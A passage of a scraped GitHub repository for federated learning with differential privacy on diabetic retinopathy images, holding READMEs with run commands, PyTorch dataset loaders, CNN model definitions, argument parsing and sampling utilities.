"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "## Final Report\nThe the technical report coressponding to this project can be found here.\n"
},
{
"alpha_fraction": 0.6628478169441223,
"alphanum_fraction": 0.710077166557312,
"avg_line_length": 56.797298431396484,
"blob_id": "d4247213f7a35fd45793d292b984f894515889fc",
"content_id": "99da356839efbc73f8018745026556703d656101",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4287,
"license_type": "permissive",
"max_line_length": 333,
"num_lines": 74,
"path": "/private_training/ReadME.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Private Training \n\nThis repository produces source code of the training stage for the proposed method in the report.\n\n> In this repository we have used some part of codes from : https://github.com/AshwinRJ/Federated-Learning-PyTorch\n\n## Dataset Preparation \n\nTo prepare the [diabetic retinopathy](https://www.kaggle.com/c/aptos2019-blindness-detection/notebooks?sortBy=scoreDescending) dataset:\n\n 1. First (and just for one time) you need to run this file: `src/dr_dataset_to_numpy.py` with the following commmand:\n\n > python src/dr_dataset_to_numpy.py --dataset=dr --dr_from_np=0\n\n 2. Running the above command will take sometimes to download the dataset and transforms it into numpy arrays and saves it.\n \n 3. After this is completed, for the rest of experiments you need to set `--dr_from_np=1`\n \n\n## How To Run Experiments\n\nIn the following we explain how you can reproduce the results shown in Figure 1 of the report.\n\n### 1. Non-Private Centralized (C)\n\n> python src/federated_main_s2.py --epochs=1 --num_users=1 --frac=1. --local_ep=100 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.001 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=0\n\n\n### 2. Centralized with Central DP (CDP)\n\n> python src/federated_main_s2.py --epochs=1 --num_users=1 --frac=1. --local_ep=100 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.001 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=1 --max_grad_norm = 2. --noise_multiplier = 1. --delta = 1e-4\n\n\n### 3. Non-Private Federated (F)\n\n> python src/federated_main_s3.py --epochs=100 --num_users=10 --frac=.5 --local_ep=5 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.002 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=0\n\n### 4. Federated with Parallel DP (FPDP)\n\n> python src/federated_main_s3.py --epochs=100 --num_users=10 --frac=.5 --local_ep=5 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.002 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=1 --max_grad_norm = 2. --noise_multiplier = 2. --delta = 1e-4\n\n### 5. Our Federated with Semi-Central DP (FSCDP)\n\n> python src/federated_main_s4.py --epochs=30001 --num_users=10 --frac=1. --local_ep=1 --local_bs=1 --virtual_batch_size=1 --optimizer='sgd' --lr=0.002 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=1 --max_grad_norm = 2. --noise_multiplier = 1.15 --delta = 1e-4 --sampling_prob= 0.03425\n\n\nNote that in FSCDP `--epochs=30001` is actually the number of iterations and not epochs. Based on the setting, `--epochs=30001` in FSCDP is similar to having 100 epochs in other FPDP and F setting. Moreover, `--sampling_prob= 0.03425` will translate into a batch size of 10 per user, 100 in total.\n\n### 6. Secure aggregation with Homomorphic Encryption: (under development, so there might still be bugs)\nInstall PySEAL by running the shell file `build_pyseal.sh`:\n``` \n> cd [path to build_pyseal.sh>]\n> chmod +x build_pyseal.sh\n> ./build_pyseal.sh\n```\nThis downloads and builds PySEAL from the source: https://github.com/Lab41/PySEAL.\n\nEnsure that mpi4py is installed. 
Else install it with `pip install mpi4py`.\n\nFor running 3 processes, with rank 0 process being the server, and rank 1 and rank 2 processes being 2 federated workers (hospitals), run the following for training on MNIST dataset:\n> mpiexec -n 3 python src_secure_aggregation/FLDP_secure_aggregation.py --model=cnn --dataset=mnist --iid=1 --withDP=0 --local_bs=32 --num_users=2 --frac=.5 --local_ep=1 --epochs=20 --verbose=1000\n\n## Tutorial:\n\nPlease see the file `JNotebook_running_FSCDP_on_Colab.ipynb` if you want to perform training on Google Colab.\n\n\n* Updated for running Tutorial:\n\nIf you receive an error about `Nvidia CUDA`, then there are two solutions at the moment:\n\n 1. In the first line at the beginning of the tutorial, use `torch==1.7.0+cu101` instead of `torch==1.6.0+cu101`.\n \n 2. Or, remove that line and just use the second line to install `Opacus`, then restart the notebook, and finally in the colab system files go to `usr —> local —> lib —> python 3.6 —> dist-packages —> opacus` and open `privacy_engine.py` and turn the line `import torchcsprng as csprng` into comment `#import torchcsprng as csprng`.\n"
},
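A quick sanity check of what a given `--sampling_prob` implies for batch sizes (the dataset size below is hypothetical; the training scripts compute the same product `int(sample_size * sampling_prob)`):

```python
# Expected (virtual) batch sizes implied by the Poisson sampling probability.
num_users = 10
sampling_prob = 0.03425
total_train_size = 2900                  # hypothetical DR training-set size
per_user_size = total_train_size // num_users

print("per-user batch  ~", int(per_user_size * sampling_prob))    # ~10
print("aggregate batch ~", int(total_train_size * sampling_prob)) # ~100
```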
{
"alpha_fraction": 0.5408282279968262,
"alphanum_fraction": 0.5539515614509583,
"avg_line_length": 43.8300666809082,
"blob_id": "23e4f0de2c77d2b79624437264cf7085214b250b",
"content_id": "9de37bbaab0b11fffe1c934a5adcd6467b43d55f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6858,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 153,
"path": "/private_training/src/datasets.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport copy\nimport torch\nimport matplotlib.image as mpimg\nimport urllib.request\nimport zipfile\nimport os\nimport pandas as pd\nfrom torchvision import datasets, transforms\nfrom sampling import dist_datasets_iid, dist_datasets_noniid\nfrom options import args_parser\nfrom torch.utils.data import Dataset, TensorDataset\nimport gdown\n\nclass DRDataset(Dataset):\n def __init__(self, data_label, data_dir, transform):\n super().__init__()\n self.data_label = data_label\n self.data_dir = data_dir\n self.transform = transform\n\n def __len__(self):\n return len(self.data_label)\n\n def __getitem__(self, index):\n img_name = self.data_label.id_code[index] + '.png'\n label = self.data_label.diagnosis[index]\n img_path = os.path.join(self.data_dir, img_name)\n image = mpimg.imread(img_path)\n image = (image + 1) * 127.5\n image = image.astype(np.uint8)\n image = self.transform(image)\n return image, label\n\n\ndef get_dataset(args):\n\n if args.dataset == 'cifar10' or args.dataset == 'cifar100':\n data_dir = '../data/cifar/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n \n if args.dataset == 'cifar10':\n train_dataset = datasets.CIFAR10(data_dir, train=True, download=True,\n transform=apply_transform) \n test_dataset = datasets.CIFAR10(data_dir, train=False, download=True,\n transform=apply_transform)\n elif args.dataset == 'cifar100':\n train_dataset = datasets.CIFAR100(data_dir, train=True, download=True,\n transform=apply_transform)\n test_dataset = datasets.CIFAR100(data_dir, train=False, download=True,\n transform=apply_transform) \n\n elif args.dataset == 'mnist' or args.dataset =='fmnist':\n if args.dataset == 'mnist':\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = '../data/mnist/'\n train_dataset = datasets.MNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n test_dataset = datasets.MNIST(data_dir, train=False, download=True,\n transform=apply_transform)\n\n else:\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = '../data/fmnist/'\n train_dataset = datasets.FashionMNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n test_dataset = datasets.FashionMNIST(data_dir, train=False, download=True,\n transform=apply_transform)\n \n elif args.dataset == 'dr':\n\n if args.dr_from_np == 1:\n _x = torch.Tensor(np.load(\"dr_train_images.npy\"))\n _y = torch.Tensor(np.load(\"dr_train_labels.npy\")).long()\n train_dataset = TensorDataset(_x,_y)\n _x = torch.Tensor(np.load(\"dr_test_images.npy\"))\n _y = torch.Tensor(np.load(\"dr_test_labels.npy\")).long()\n test_dataset = TensorDataset(_x,_y) \n \n else:\n data_dir = '../data/diabetic_retinopathy/'\n if not os.path.exists(data_dir): \n os.makedirs(data_dir)\n \n #download ZIP, unzip it, delete zip file\n dataset_url = \"https://drive.google.com/uc?id=1G-4UhPKiQY3NxQtZiWuOkdocDTW6Bw0u\"\n zip_path = data_dir + 'images.zip'\n gdown.download(dataset_url, zip_path, quiet=False)\n print(\"Extracting...!\")\n \n with zipfile.ZipFile(zip_path, 'r') as zip_ref:\n zip_ref.extractall(data_dir)\n print(\"Extracted!\")\n os.remove(zip_path)\n\n #download train and test dataframes\n test_csv_link = 'https://drive.google.com/uc?id=1dmeYLURzEvx962th4lAxaVN3r6nlhTjS'\n train_csv_link = 'https://drive.google.com/uc?id=1SMb9CRHjB6UH2WnTZDFVSgpA6_nh75qN'\n test_csv_path = 
data_dir + 'test_set.csv'\n train_csv_path = data_dir + 'train_set.csv'\n urllib.request.urlretrieve(train_csv_link, train_csv_path)\n urllib.request.urlretrieve(test_csv_link, test_csv_path)\n df_train = pd.read_csv(train_csv_path)\n df_test = pd.read_csv(test_csv_path)\n\n #create train and test datasets\n apply_transform = transforms.Compose([transforms.ToPILImage(mode='RGB'),\n transforms.RandomHorizontalFlip(),\n transforms.Resize(265),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n image_directory = data_dir + 'images/'\n train_dataset = DRDataset(data_label = df_train, data_dir = image_directory,\n transform = apply_transform)\n test_dataset = DRDataset(data_label = df_test, data_dir = image_directory,\n transform = apply_transform)\n\n\n if args.sub_dataset_size > 0:\n rnd_indices = np.random.RandomState(seed=0).permutation(len(train_dataset.data)) \n train_dataset.data = train_dataset.data[rnd_indices]\n if torch.is_tensor(train_dataset.targets):\n train_dataset.targets = train_dataset.targets[rnd_indices] \n else:\n train_dataset.targets = torch.tensor(train_dataset.targets)[rnd_indices]\n train_dataset.data = train_dataset.data[:args.sub_dataset_size]\n train_dataset.targets = train_dataset.targets[:args.sub_dataset_size]\n print(\"\\nThe chosen sub dataset has the following shape:\")\n print(train_dataset.data.shape, train_dataset.targets.shape,\"\\n\") \n\n if args.iid: \n user_groups = dist_datasets_iid(train_dataset, args.num_users) \n else:\n user_groups = dist_datasets_noniid(train_dataset, args.num_users,\n num_shards=1000, \n unequal=args.unequal) \n \n return train_dataset, test_dataset, user_groups\n\n## For test\nif __name__ == '__main__':\n args = args_parser()\n train_dataset, test_dataset, user_groups = get_dataset(args)"
},
{
"alpha_fraction": 0.3801843225955963,
"alphanum_fraction": 0.4714285731315613,
"avg_line_length": 32.39230728149414,
"blob_id": "3d11265d22e42c3ba73f49cef3fbf9941317597f",
"content_id": "178bbf8b78c8d9136343ca56bfe0aadce8b9db47",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4340,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 130,
"path": "/private_training/src/models.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass CNNMnistRelu(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\nclass CNNMnistTanh(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = torch.tanh(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = torch.tanh(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = torch.tanh(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\n\nclass CNNFashion_MnistRelu(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\nclass CNNFashion_MnistTanh(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = torch.tanh(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = torch.tanh(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = torch.tanh(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\nclass CNNCifar10Relu(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(32, 32, 5)\n self.fc1 = nn.Linear(32 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 32 * 5 * 5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return F.log_softmax(x, dim=1)\n\nclass CNNCifar10Tanh(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(32, 32, 5)\n self.fc1 = nn.Linear(32 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n\n def 
forward(self, x):\n x = self.pool(torch.tanh(self.conv1(x)))\n x = self.pool(torch.tanh(self.conv2(x)))\n x = x.view(-1, 32 * 5 * 5)\n x = torch.tanh(self.fc1(x))\n x = torch.tanh(self.fc2(x))\n x = self.fc3(x)\n return F.log_softmax(x, dim=1)"
},
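A minimal shape check for the networks above (run from `private_training/src`), verifying the per-layer shapes annotated in the comments:

```python
import torch
from models import CNNMnistRelu, CNNCifar10Relu

# MNIST net: [B, 1, 28, 28] in, [B, 10] logits out.
x = torch.randn(4, 1, 28, 28)
assert CNNMnistRelu()(x).shape == (4, 10)

# CIFAR-10 net: [B, 3, 32, 32] in, [B, 10] log-probabilities out.
x = torch.randn(4, 3, 32, 32)
assert CNNCifar10Relu()(x).shape == (4, 10)
print("shape checks passed")
```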
{
"alpha_fraction": 0.744303822517395,
"alphanum_fraction": 0.75443035364151,
"avg_line_length": 18.75,
"blob_id": "320e7ca40a5f87ebe7d0d8fe7bfea28d117c629b",
"content_id": "4054f0087d1a54580e0fce2f51f9f0e3a3bed4e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 395,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 20,
"path": "/private_inference/app/README.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Private inference mobile app demo\n\nCode adapted from [this repo](https://github.com/avinassh/pytorch-flask-api-heroku)\n\n## Requirements\n\nInstall them from `requirements.txt`:\n\n pip install -r requirements.txt\n\n\n## Local Deployment\n\nRun the server:\n\n python app.py\n\nAnd then go to localhost:5000 in your browser.\n\nExample files that the demo will accept are in the example_inputs folder.\n"
},
{
"alpha_fraction": 0.4545454680919647,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 14.399999618530273,
"blob_id": "9b3c6e5b2ea27c6494af0562be8d7469a1a9e836",
"content_id": "5b6c38cfc1f6abb840f83cdcfb59f92a11d0d301",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 5,
"path": "/private_inference/app/requirements.txt",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "gunicorn==20.0.4\nFlask==1.0.3\ntorchvision==0.2.1\nnumpy==1.16.4\nPillow==7.1.0\n"
},
{
"alpha_fraction": 0.5861960053443909,
"alphanum_fraction": 0.598802387714386,
"avg_line_length": 51.88333511352539,
"blob_id": "1e43729320b6d2b9f0f016dcf081fc065156607c",
"content_id": "c9a8e0c359d79adc39bb3c039186beab0258da13",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3173,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 60,
"path": "/private_training/src/options.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import argparse\n\ndef args_parser():\n parser = argparse.ArgumentParser()\n\n # federated arguments (Notation for the arguments followed from paper)\n parser.add_argument('--epochs', type=int, default=1,\n help=\"number of rounds of training\")\n parser.add_argument('--num_users', type=int, default=1,\n help=\"number of users: K\")\n parser.add_argument('--frac', type=float, default=1.,\n help='the fraction of clients')\n parser.add_argument('--local_ep', type=int, default=4,\n help=\"the number of local epochs: E\")\n parser.add_argument('--local_bs', type=int, default=50,\n help=\"local batch size: B\")\n\n # optimizer arguments\n parser.add_argument('--optimizer', type=str, default='sgd', help=\"type \\\n of optimizer\")\n parser.add_argument('--lr', type=float, default=0.01,\n help='learning rate')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='SGD momentum (default: 0.0)')\n \n \n\n # model arguments\n parser.add_argument('--model', type=str, default='cnn', help='model name')\n parser.add_argument('--activation', type=str, default=\"relu\", help='activation')\n\n ## DP arguments\n parser.add_argument('--withDP', type=int, default=0, help='WithDP')\n parser.add_argument('--max_grad_norm', type=float, default=1.5, help='DP MAX_GRAD_NORM')\n parser.add_argument('--noise_multiplier', type=float, default=.75, help='DP NOISE_MULTIPLIER')\n parser.add_argument('--delta', type=float, default=.00001, help='DP DELTA')\n parser.add_argument('--virtual_batch_size', type=int, default=50, help='DP VIRTUAL_BATCH_SIZE')\n parser.add_argument('--sampling_prob', type=int, default=0.03425 , help='sampling_prob') \n\n # dataset arguments\n parser.add_argument('--dataset', type=str, default='mnist', help=\"name \\\n of dataset\")\n parser.add_argument('--num_classes', type=int, default=10, help=\"number \\\n of classes\")\n parser.add_argument('--gpu', default=None, help=\"To use cuda, set \\\n to a specific GPU ID. Default set to use CPU.\")\n parser.add_argument('--iid', type=int, default=1,\n help='Default set to IID. Set to 0 for non-IID.')\n parser.add_argument('--unequal', type=int, default=0,\n help='whether to use unequal data splits for \\\n non-i.i.d setting (use 0 for equal splits)')\n parser.add_argument('--sub_dataset_size', type=int, default=-1, help='To reduce original data to a smaller \\\n sized dataset. For experimental purposes.')\n parser.add_argument('--local_test_split', type=float, default=0., help='local_test_split') \n parser.add_argument('--dr_from_np', type=float, default=0, help='for diabetic_retinopathy dataset') \n parser.add_argument('--exp_name', type=str, default=\"exp_results\", help=\"The name of current experiment for logging.\")\n \n\n args = parser.parse_args()\n return args\n"
},
{
"alpha_fraction": 0.7928994297981262,
"alphanum_fraction": 0.7928994297981262,
"avg_line_length": 47.28571319580078,
"blob_id": "fa2a21e0785031938ff5c5c350bf6bfc655d6936",
"content_id": "da1f66ffa5b03aeceb7961771181446360110aaf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 338,
"license_type": "permissive",
"max_line_length": 185,
"num_lines": 7,
"path": "/video_demo/ReadME.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "## Demo Video\n\nThis folder contains a Proof-of-Concept video of the demo application the team has created. Given an image from the diabetic retinopathy dataset, it returns a diagnosis within seconds. \n\nThe demo is viewable at https://imperial-diagnostics.herokuapp.com.\n\nSource code is available in this repo, at `private_inference/app`.\n"
},
{
"alpha_fraction": 0.594694972038269,
"alphanum_fraction": 0.6015915274620056,
"avg_line_length": 29.901639938354492,
"blob_id": "0298cc73d8a75ac9c6dd4a8d289d48c6fc0a853c",
"content_id": "e4c5f3c977163d787a86f8388ccd0a3bea619f42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1885,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 61,
"path": "/private_training/src_secure_aggregation/utils.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport copy\nimport torch\nfrom torchvision import datasets, transforms\nfrom sampling import dist_datasets_iid, dist_datasets_noniid\nfrom options import args_parser\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\n\n\ndef test_inference(args, model, test_dataset):\n model.eval()\n loss, total, correct = 0.0, 0.0, 0.0\n device = 'cuda' if args.gpu else 'cpu'\n criterion = nn.NLLLoss().to(device)\n testloader = DataLoader(test_dataset, batch_size=128,\n shuffle=False)\n for batch_idx, (images, labels) in enumerate(testloader):\n images, labels = images.to(device), labels.to(device)\n # Inference\n outputs = model(images)\n batch_loss = criterion(outputs, labels)\n loss += batch_loss.item()\n # Prediction\n _, pred_labels = torch.max(outputs, 1)\n pred_labels = pred_labels.view(-1)\n correct += torch.sum(torch.eq(pred_labels, labels)).item()\n total += len(labels)\n\n accuracy = correct/total\n return accuracy, loss\n\n\ndef average_weights(w):\n \"\"\"\n Returns the average of the weights.\n \"\"\"\n w_avg = copy.deepcopy(w[0])\n for key in w_avg.keys():\n for i in range(1, len(w)):\n w_avg[key] += w[i][key]\n w_avg[key] = torch.div(w_avg[key], len(w))\n return w_avg\n\n\ndef exp_details(args):\n print('\\nExperimental details:')\n print(f' Model : {args.model}')\n print(f' Optimizer : {args.optimizer}')\n print(f' Learning : {args.lr}')\n print(f' Global Rounds : {args.epochs}\\n')\n\n print(' Federated parameters:')\n if args.iid:\n print(' IID')\n else:\n print(' Non-IID')\n print(f' Fraction of users : {args.frac}')\n print(f' Local Batch size : {args.local_bs}')\n print(f' Local Epochs : {args.local_ep}\\n')\n return\n"
},
{
"alpha_fraction": 0.5674195885658264,
"alphanum_fraction": 0.5854437351226807,
"avg_line_length": 41.55339813232422,
"blob_id": "577d2e807a40db90908b8157562995cbcec67ad3",
"content_id": "48ac85e2246cc23a09a4794b9fdabd02ba1c2c3a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4383,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 103,
"path": "/private_training/src_secure_aggregation/datasets_secure.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport copy\nimport torch\nfrom torchvision import datasets, transforms\nfrom sampling_secure import dist_datasets_iid, dist_datasets_noniid\nfrom options import args_parser\n\n\ndef get_train_dataset(args,rank):\n if args.dataset == 'cifar10' or args.dataset == 'cifar100':\n data_dir = './data/cifar/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n if args.dataset == 'cifar10':\n train_dataset = datasets.CIFAR10(data_dir, train=True, download=True,\n transform=apply_transform)\n elif args.dataset == 'cifar100':\n train_dataset = datasets.CIFAR100(data_dir, train=True, download=True,\n transform=apply_transform)\n elif args.dataset == 'mnist' or 'fmnist':\n if args.dataset == 'mnist':\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/mnist/'\n train_dataset = datasets.MNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n else:\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/fmnist/'\n train_dataset = datasets.FashionMNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n\n if args.sub_dataset_size > 0:\n rnd_indices = np.random.RandomState(seed=0).permutation(len(train_dataset.data))\n train_dataset.data = train_dataset.data[rnd_indices]\n if torch.is_tensor(train_dataset.targets):\n train_dataset.targets = train_dataset.targets[rnd_indices]\n else:\n train_dataset.targets = torch.tensor(train_dataset.targets)[rnd_indices]\n train_dataset.data = train_dataset.data[:args.sub_dataset_size]\n train_dataset.targets = train_dataset.targets[:args.sub_dataset_size]\n print(\"\\nThe chosen sub dataset has the following shape:\")\n print(train_dataset.data.shape, train_dataset.targets.shape, \"\\n\")\n\n if args.iid:\n user_groups = dist_datasets_iid(train_dataset, args.num_users)\n else:\n user_groups = dist_datasets_noniid(train_dataset, args.num_users,\n num_shards=1000,unequal=args.unequal)\n\n data_ind = user_groups[rank-1]\n train_dataset = [train_dataset[int(i)] for i in data_ind]\n return(train_dataset, user_groups[rank-1])\n\ndef get_test_dataset(args):\n if args.dataset == 'cifar10' or args.dataset == 'cifar100':\n data_dir = './data/cifar/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n if args.dataset == 'cifar10':\n test_dataset = datasets.CIFAR10(data_dir, train=False, download=True,\n transform = apply_transform)\n elif args.dataset == 'cifar100':\n test_dataset = datasets.CIFAR100(data_dir, train=False, download=True,\n transform = apply_transform)\n elif args.dataset == 'mnist' or 'fmnist':\n if args.dataset == 'mnist':\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/mnist/'\n test_dataset = datasets.MNIST(data_dir, train=False, download=True,\n transform=apply_transform)\n else:\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/fmnist/'\n test_dataset = datasets.FashionMNIST(data_dir, train=False, download=True,\n transform = apply_transform)\n\n return(test_dataset)\n\n## For test\nif __name__ == '__main__':\n args = args_parser()\n rank=2\n train_dataset, user_groups = get_train_dataset(args,rank)\n test_dataset = 
get_test_dataset(args)\n print(train_dataset)\n print(test_dataset)\n print(np.unique([len(v) for k, v in user_groups.items()]))\n"
},
{
"alpha_fraction": 0.5274693369865417,
"alphanum_fraction": 0.5426651239395142,
"avg_line_length": 40.180721282958984,
"blob_id": "e03a2762ddb353ff088e0a7d919641f845e3cd57",
"content_id": "7d304eae29c0566129ed089e1ebf1760cd3c11bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3422,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 83,
"path": "/private_training/src/sampling.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom torchvision import datasets, transforms\n\ndef dist_datasets_iid(dataset, num_users):\n num_items = int(len(dataset)/num_users)\n dict_users, all_idxs = {}, [i for i in range(len(dataset))]\n for i in range(num_users):\n dict_users[i] = set(np.random.RandomState(seed=i).choice(all_idxs, num_items,replace=False))\n all_idxs = list(set(all_idxs) - dict_users[i])\n\n if i%5000==0:\n print(i//5000)\n \n return dict_users\n\ndef dist_datasets_noniid(dataset, num_users, num_shards=None, num_imgs=None, \n unequal=0, min_shard = None, max_shard = None):\n \n if num_shards is None:\n num_shards = num_users\n if num_imgs is None:\n num_imgs = len(dataset)//num_shards\n assert num_shards//num_users > 0\n\n idx_shard = [i for i in range(num_shards)]\n dict_users = {i: np.array([]) for i in range(num_users)}\n idxs = np.arange(num_shards*num_imgs)\n labels = np.array(dataset.targets)\n\n # sort labels\n idxs_labels = np.vstack((idxs, labels))\n idxs_labels = idxs_labels[:, 